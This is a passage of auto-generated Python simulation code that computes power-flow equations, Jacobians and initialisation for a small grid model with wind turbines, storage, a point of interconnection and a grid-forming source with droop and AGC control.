struct[0].Gy[17,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[18,14] = V_POI*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[18,15] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[18,18] = V_GRID*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + 2*V_POI*(g_POI_GRID + g_POI_POImv) + V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[18,19] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[18,20] = V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[18,21] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[19,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[19,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[19,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + 2*V_POI*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[19,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[19,20] = V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[19,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,18] = V_GRID*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,19] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[20,20] = 2*V_GRID*g_POI_GRID + V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,21] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[20,25] = -S_n_GRID/S_base
struct[0].Gy[21,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[21,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[21,20] = 2*V_GRID*(-b_POI_GRID - bs_POI_GRID/2) + V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[21,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[21,26] = -S_n_GRID/S_base
struct[0].Gy[22,20] = K_p_GRID*(-i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy[22,21] = K_p_GRID*(V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy[22,23] = K_p_GRID*(-2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy[22,24] = K_p_GRID*(-2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy[22,27] = K_p_GRID
struct[0].Gy[23,20] = -sin(delta_GRID - theta_GRID)
struct[0].Gy[23,21] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[23,23] = -R_v_GRID
struct[0].Gy[23,24] = X_v_GRID
struct[0].Gy[24,20] = -cos(delta_GRID - theta_GRID)
struct[0].Gy[24,21] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[24,23] = -X_v_GRID
struct[0].Gy[24,24] = -R_v_GRID
struct[0].Gy[25,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[25,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[25,23] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[25,24] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,20] = i_d_GRID*cos(delta_GRID - theta_GRID) - i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[26,21] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,23] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,24] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[27,22] = -1/Droop_GRID
struct[0].Gy[27,29] = K_sec_GRID
struct[0].Gy[29,28] = -K_p_agc
if mode > 12:
struct[0].Fu[1,23] = 1
struct[0].Fu[2,22] = 1/T_v_GRID
struct[0].Fu[2,26] = K_q_GRID/T_v_GRID
struct[0].Gu[0,0] = -1/S_base
struct[0].Gu[1,1] = -1/S_base
struct[0].Gu[2,2] = -1/S_base
struct[0].Gu[3,3] = -1/S_base
struct[0].Gu[4,4] = -1/S_base
struct[0].Gu[5,5] = -1/S_base
struct[0].Gu[6,6] = -1/S_base
struct[0].Gu[7,7] = -1/S_base
struct[0].Gu[8,8] = -1/S_base
struct[0].Gu[9,9] = -1/S_base
struct[0].Gu[10,10] = -1/S_base
struct[0].Gu[11,11] = -1/S_base
struct[0].Gu[12,12] = -1/S_base
struct[0].Gu[13,13] = -1/S_base
struct[0].Gu[14,14] = -1/S_base
struct[0].Gu[15,15] = -1/S_base
struct[0].Gu[16,16] = -1/S_base
struct[0].Gu[17,17] = -1/S_base
struct[0].Gu[18,18] = -1/S_base
struct[0].Gu[19,19] = -1/S_base
struct[0].Gu[20,20] = -1/S_base
struct[0].Gu[21,21] = -1/S_base
struct[0].Gu[22,23] = K_p_GRID
struct[0].Gu[27,25] = 1/Droop_GRID
struct[0].Hx[11,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Hy[0,0] = 1
struct[0].Hy[1,2] = 1
struct[0].Hy[2,4] = 1
struct[0].Hy[3,6] = 1
struct[0].Hy[4,8] = 1
struct[0].Hy[5,10] = 1
struct[0].Hy[6,12] = 1
struct[0].Hy[7,14] = 1
struct[0].Hy[8,16] = 1
struct[0].Hy[9,18] = 1
struct[0].Hy[10,20] = 1
struct[0].Hy[11,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Hy[11,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Hy[11,23] = 2*R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Hy[11,24] = 2*R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)
def ini_nn(struct,mode):
# Parameters:
S_base = struct[0].S_base
g_W1mv_W2mv = struct[0].g_W1mv_W2mv
b_W1mv_W2mv = struct[0].b_W1mv_W2mv
bs_W1mv_W2mv = struct[0].bs_W1mv_W2mv
g_W2mv_W3mv = struct[0].g_W2mv_W3mv
b_W2mv_W3mv = struct[0].b_W2mv_W3mv
bs_W2mv_W3mv = struct[0].bs_W2mv_W3mv
g_W3mv_POImv = struct[0].g_W3mv_POImv
b_W3mv_POImv = struct[0].b_W3mv_POImv
bs_W3mv_POImv = struct[0].bs_W3mv_POImv
g_STmv_POImv = struct[0].g_STmv_POImv
b_STmv_POImv = struct[0].b_STmv_POImv
bs_STmv_POImv = struct[0].bs_STmv_POImv
g_POI_GRID = struct[0].g_POI_GRID
b_POI_GRID = struct[0].b_POI_GRID
bs_POI_GRID = struct[0].bs_POI_GRID
g_POI_POImv = struct[0].g_POI_POImv
b_POI_POImv = struct[0].b_POI_POImv
bs_POI_POImv = struct[0].bs_POI_POImv
g_W1mv_W1lv = struct[0].g_W1mv_W1lv
b_W1mv_W1lv = struct[0].b_W1mv_W1lv
bs_W1mv_W1lv = struct[0].bs_W1mv_W1lv
g_W2mv_W2lv = struct[0].g_W2mv_W2lv
b_W2mv_W2lv = struct[0].b_W2mv_W2lv
bs_W2mv_W2lv = struct[0].bs_W2mv_W2lv
g_W3mv_W3lv = struct[0].g_W3mv_W3lv
b_W3mv_W3lv = struct[0].b_W3mv_W3lv
bs_W3mv_W3lv = struct[0].bs_W3mv_W3lv
g_STmv_STlv = struct[0].g_STmv_STlv
b_STmv_STlv = struct[0].b_STmv_STlv
bs_STmv_STlv = struct[0].bs_STmv_STlv
U_W1lv_n = struct[0].U_W1lv_n
U_W2lv_n = struct[0].U_W2lv_n
U_W3lv_n = struct[0].U_W3lv_n
U_STlv_n = struct[0].U_STlv_n
U_W1mv_n = struct[0].U_W1mv_n
U_W2mv_n = struct[0].U_W2mv_n
U_W3mv_n = struct[0].U_W3mv_n
U_POImv_n = struct[0].U_POImv_n
U_STmv_n = struct[0].U_STmv_n
U_POI_n = struct[0].U_POI_n
U_GRID_n = struct[0].U_GRID_n
S_n_GRID = struct[0].S_n_GRID
Omega_b_GRID = struct[0].Omega_b_GRID
K_p_GRID = struct[0].K_p_GRID
T_p_GRID = struct[0].T_p_GRID
K_q_GRID = struct[0].K_q_GRID
T_v_GRID = struct[0].T_v_GRID
X_v_GRID = struct[0].X_v_GRID
R_v_GRID = struct[0].R_v_GRID
K_delta_GRID = struct[0].K_delta_GRID
K_sec_GRID = struct[0].K_sec_GRID
Droop_GRID = struct[0].Droop_GRID
K_p_agc = struct[0].K_p_agc
K_i_agc = struct[0].K_i_agc
# Inputs:
P_W1lv = struct[0].P_W1lv
Q_W1lv = struct[0].Q_W1lv
P_W2lv = struct[0].P_W2lv
Q_W2lv = struct[0].Q_W2lv
P_W3lv = struct[0].P_W3lv
Q_W3lv = struct[0].Q_W3lv
P_STlv = struct[0].P_STlv
Q_STlv = struct[0].Q_STlv
P_W1mv = struct[0].P_W1mv
Q_W1mv = struct[0].Q_W1mv
P_W2mv = struct[0].P_W2mv
Q_W2mv = struct[0].Q_W2mv
P_W3mv = struct[0].P_W3mv
Q_W3mv = struct[0].Q_W3mv
P_POImv = struct[0].P_POImv
Q_POImv = struct[0].Q_POImv
P_STmv = struct[0].P_STmv
Q_STmv = struct[0].Q_STmv
P_POI = struct[0].P_POI
Q_POI = struct[0].Q_POI
P_GRID = struct[0].P_GRID
Q_GRID = struct[0].Q_GRID
v_ref_GRID = struct[0].v_ref_GRID
p_m_GRID = struct[0].p_m_GRID
p_c_GRID = struct[0].p_c_GRID
omega_ref_GRID = struct[0].omega_ref_GRID
q_ref_GRID = struct[0].q_ref_GRID
# Dynamical states:
delta_GRID = struct[0].x[0,0]
xi_p_GRID = struct[0].x[1,0]
e_qv_GRID = struct[0].x[2,0]
xi_freq = struct[0].x[3,0]
# Algebraic states:
V_W1lv = struct[0].y_ini[0,0]
theta_W1lv = struct[0].y_ini[1,0]
V_W2lv = struct[0].y_ini[2,0]
theta_W2lv = struct[0].y_ini[3,0]
V_W3lv = struct[0].y_ini[4,0]
theta_W3lv = struct[0].y_ini[5,0]
V_STlv = struct[0].y_ini[6,0]
theta_STlv = struct[0].y_ini[7,0]
V_W1mv = struct[0].y_ini[8,0]
theta_W1mv = struct[0].y_ini[9,0]
V_W2mv = struct[0].y_ini[10,0]
theta_W2mv = struct[0].y_ini[11,0]
V_W3mv = struct[0].y_ini[12,0]
theta_W3mv = struct[0].y_ini[13,0]
V_POImv = struct[0].y_ini[14,0]
theta_POImv = struct[0].y_ini[15,0]
V_STmv = struct[0].y_ini[16,0]
theta_STmv = struct[0].y_ini[17,0]
V_POI = struct[0].y_ini[18,0]
theta_POI = struct[0].y_ini[19,0]
V_GRID = struct[0].y_ini[20,0]
theta_GRID = struct[0].y_ini[21,0]
omega_GRID = struct[0].y_ini[22,0]
i_d_GRID = struct[0].y_ini[23,0]
i_q_GRID = struct[0].y_ini[24,0]
p_g_GRID = struct[0].y_ini[25,0]
q_g_GRID = struct[0].y_ini[26,0]
p_m_GRID = struct[0].y_ini[27,0]
omega_coi = struct[0].y_ini[28,0]
p_agc = struct[0].y_ini[29,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = -K_delta_GRID*delta_GRID + Omega_b_GRID*(omega_GRID - omega_coi)
struct[0].f[1,0] = -i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID
struct[0].f[2,0] = (K_q_GRID*(-q_g_GRID + q_ref_GRID) - e_qv_GRID + v_ref_GRID)/T_v_GRID
struct[0].f[3,0] = 1 - omega_coi
# Algebraic equations:
if mode == 3:
struct[0].g[0,0] = -P_W1lv/S_base + V_W1lv**2*g_W1mv_W1lv + V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].g[1,0] = -Q_W1lv/S_base + V_W1lv**2*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].g[2,0] = -P_W2lv/S_base + V_W2lv**2*g_W2mv_W2lv + V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].g[3,0] = -Q_W2lv/S_base + V_W2lv**2*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].g[4,0] = -P_W3lv/S_base + V_W3lv**2*g_W3mv_W3lv + V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].g[5,0] = -Q_W3lv/S_base + V_W3lv**2*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].g[6,0] = -P_STlv/S_base + V_STlv**2*g_STmv_STlv + V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].g[7,0] = -Q_STlv/S_base + V_STlv**2*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].g[8,0] = -P_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv**2*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].g[9,0] = -Q_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv**2*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].g[10,0] = -P_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv**2*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].g[11,0] = -Q_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv**2*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].g[12,0] = -P_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + V_W3mv**2*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].g[13,0] = -Q_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + V_W3mv**2*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].g[14,0] = -P_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv**2*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].g[15,0] = -Q_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv**2*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].g[16,0] = -P_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + V_STmv**2*(g_STmv_POImv + g_STmv_STlv)
struct[0].g[17,0] = -Q_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + V_STmv**2*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].g[18,0] = -P_POI/S_base + V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI**2*(g_POI_GRID + g_POI_POImv) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].g[19,0] = -Q_POI/S_base + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI**2*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].g[20,0] = -P_GRID/S_base + V_GRID**2*g_POI_GRID + V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) - S_n_GRID*p_g_GRID/S_base
struct[0].g[21,0] = -Q_GRID/S_base + V_GRID**2*(-b_POI_GRID - bs_POI_GRID/2) + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) - S_n_GRID*q_g_GRID/S_base
struct[0].g[22,0] = K_p_GRID*(-i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID + xi_p_GRID/T_p_GRID) - omega_GRID + 1
struct[0].g[23,0] = -R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID) + X_v_GRID*i_q_GRID
struct[0].g[24,0] = -R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID) - X_v_GRID*i_d_GRID + e_qv_GRID
struct[0].g[25,0] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID) - p_g_GRID
struct[0].g[26,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID) - q_g_GRID
struct[0].g[27,0] = K_sec_GRID*p_agc + p_c_GRID - p_m_GRID - (omega_GRID - omega_ref_GRID)/Droop_GRID
struct[0].g[28,0] = omega_GRID - omega_coi
struct[0].g[29,0] = K_i_agc*xi_freq + K_p_agc*(1 - omega_coi) - p_agc
# Outputs:
if mode == 3:
struct[0].h[0,0] = V_W1lv
struct[0].h[1,0] = V_W2lv
struct[0].h[2,0] = V_W3lv
struct[0].h[3,0] = V_STlv
struct[0].h[4,0] = V_W1mv
struct[0].h[5,0] = V_W2mv
struct[0].h[6,0] = V_W3mv
struct[0].h[7,0] = V_POImv
struct[0].h[8,0] = V_STmv
struct[0].h[9,0] = V_POI
struct[0].h[10,0] = V_GRID
struct[0].h[11,0] = i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) + i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID))
if mode == 10:
struct[0].Fx_ini[0,0] = -K_delta_GRID
struct[0].Fx_ini[1,0] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fx_ini[2,2] = -1/T_v_GRID
if mode == 11:
struct[0].Fy_ini[0,22] = Omega_b_GRID
struct[0].Fy_ini[0,28] = -Omega_b_GRID
struct[0].Fy_ini[1,20] = -i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,21] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,23] = -2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,24] = -2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,27] = 1
struct[0].Fy_ini[2,26] = -K_q_GRID/T_v_GRID
struct[0].Fy_ini[3,28] = -1
struct[0].Gy_ini[0,0] = 2*V_W1lv*g_W1mv_W1lv + V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[0,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[0,8] = V_W1lv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[0,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,0] = 2*V_W1lv*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[2,2] = 2*V_W2lv*g_W2mv_W2lv + V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[2,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[2,10] = V_W2lv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[2,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,2] = 2*V_W2lv*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,10] = V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[4,4] = 2*V_W3lv*g_W3mv_W3lv + V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
